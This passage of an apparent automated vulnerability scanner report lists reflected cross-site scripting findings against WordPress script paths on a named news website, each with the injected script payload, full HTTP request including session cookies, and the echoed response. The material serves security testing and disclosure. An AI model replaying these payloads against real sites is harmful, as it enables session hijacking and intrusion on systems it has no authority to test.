Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:37 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:37 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes26ae6\"><script>alert(1)</script>6cd9f7aaf41/js/jquery/ui.core.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.349. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72448"><script>alert(1)</script>0f970ac7d28 was submitted in the REST URL parameter 2. This input was echoed as 72448\"><script>alert(1)</script>0f970ac7d28 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js72448"><script>alert(1)</script>0f970ac7d28/jquery/ui.core.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:33 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js72448\"><script>alert(1)</script>0f970ac7d28/jquery/ui.core.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.350. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75573"><script>alert(1)</script>aba3e01e65 was submitted in the REST URL parameter 3. This input was echoed as 75573\"><script>alert(1)</script>aba3e01e65 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery75573"><script>alert(1)</script>aba3e01e65/ui.core.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:31 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:34 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:34 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51013

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery75573\"><script>alert(1)</script>aba3e01e65/ui.core.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.351. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.core.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.core.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cc435"><script>alert(1)</script>273f81fd7b6 was submitted in the REST URL parameter 4. This input was echoed as cc435\"><script>alert(1)</script>273f81fd7b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.core.jscc435"><script>alert(1)</script>273f81fd7b6?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:23:36 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:39 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:39 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51015

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.core.jscc435\"><script>alert(1)</script>273f81fd7b6?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.352. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86d6a"><script>alert(1)</script>32526c1adac was submitted in the REST URL parameter 1. This input was echoed as 86d6a\"><script>alert(1)</script>32526c1adac in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes86d6a"><script>alert(1)</script>32526c1adac/js/jquery/ui.dialog.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:53 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:55 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:55 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes86d6a\"><script>alert(1)</script>32526c1adac/js/jquery/ui.dialog.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.353. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5b69d"><script>alert(1)</script>b482ecd7f34 was submitted in the REST URL parameter 2. This input was echoed as 5b69d\"><script>alert(1)</script>b482ecd7f34 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js5b69d"><script>alert(1)</script>b482ecd7f34/jquery/ui.dialog.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:59 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:23:02 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:23:02 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js5b69d\"><script>alert(1)</script>b482ecd7f34/jquery/ui.dialog.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.354. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d6570"><script>alert(1)</script>7617c121d11 was submitted in the REST URL parameter 3. This input was echoed as d6570\"><script>alert(1)</script>7617c121d11 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryd6570"><script>alert(1)</script>7617c121d11/ui.dialog.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:24:07 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:24:08 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:24:08 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jqueryd6570\"><script>alert(1)</script>7617c121d11/ui.dialog.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.355. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.dialog.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.dialog.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f4c83"><script>alert(1)</script>2c7deadcccb was submitted in the REST URL parameter 4. This input was echoed as f4c83\"><script>alert(1)</script>2c7deadcccb in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.dialog.jsf4c83"><script>alert(1)</script>2c7deadcccb?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:25:01 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:25:01 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:25:01 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51019

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jquery/ui.dialog.jsf4c83\"><script>alert(1)</script>2c7deadcccb?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.356. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1faf3"><script>alert(1)</script>ba532f3735f was submitted in the REST URL parameter 1. This input was echoed as 1faf3\"><script>alert(1)</script>ba532f3735f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes1faf3"><script>alert(1)</script>ba532f3735f/js/jquery/ui.draggable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:20:30 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:20:31 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:20:31 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes1faf3\"><script>alert(1)</script>ba532f3735f/js/jquery/ui.draggable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.357. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 62d0d"><script>alert(1)</script>5688100798f was submitted in the REST URL parameter 2. This input was echoed as 62d0d\"><script>alert(1)</script>5688100798f in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js62d0d"><script>alert(1)</script>5688100798f/jquery/ui.draggable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:21:19 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:21:21 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:21:21 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js62d0d\"><script>alert(1)</script>5688100798f/jquery/ui.draggable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.358. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 3] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b2791"><script>alert(1)</script>b176f0618fd was submitted in the REST URL parameter 3. This input was echoed as b2791\"><script>alert(1)</script>b176f0618fd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jqueryb2791"><script>alert(1)</script>b176f0618fd/ui.draggable.js?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=rqv6492k0k62as9elpq6dhnaj2; crep=show; __utmz=191539816.1295903510.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/35; __utma=191539816.66428457.1295903510.1295903510.1295903510.1; __utmc=191539816; __utmb=191539816.1.10.1295903510

Response

HTTP/1.1 404 Not Found
Date: Mon, 24 Jan 2011 22:22:14 GMT
Server: Apache/2.2.14 (Ubuntu)
X-Powered-By: PHP/5.3.2-1ubuntu4.7
X-Pingback: http://starscene.dailystar.com.lb/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: lastpost=f083d005e3a4cb8b93fd0a8c3223fe39
Set-Cookie: crep=show; expires=Tue, 25-Jan-2011 22:22:15 GMT; path=/; domain=.starscene.dailystar.com.lb
Last-Modified: Mon, 24 Jan 2011 22:22:15 GMT
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 51025

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.co
...[SNIP]...
<a href="#" onclick="FB.Connect.requireSession(function() { window.location='/wp-includes/js/jqueryb2791\"><script>alert(1)</script>b176f0618fd/ui.draggable.js?ver=1.7.1'; }); return true;" >
...[SNIP]...

4.359. http://starscene.dailystar.com.lb/wp-includes/js/jquery/ui.draggable.js [REST URL parameter 4] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://starscene.dailystar.com.lb
Path:	/wp-includes/js/jquery/ui.draggable.js

Issue detail

The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d0afc"><script>alert(1)</script>4e6d203c207 was submitted in the REST URL parameter 4. This input was echoed as d0afc\"><script>alert(1)</script>4e6d203c207 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /wp-includes/js/jquery/ui.draggable.jsd0afc"><script>alert(1)</script>4e6d203c207?ver=1.7.1 HTTP/1.1
Host: starscene.dailystar.com.lb
Proxy-Connection: keep-alive
Referer: http://starscene.dailystar.com.lb/music-scenea960d%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eb7d5247b69c/2010/11/pianist-geoffrey-saba-performs-at-aubs-assembly-hall/x22
Accept: */*
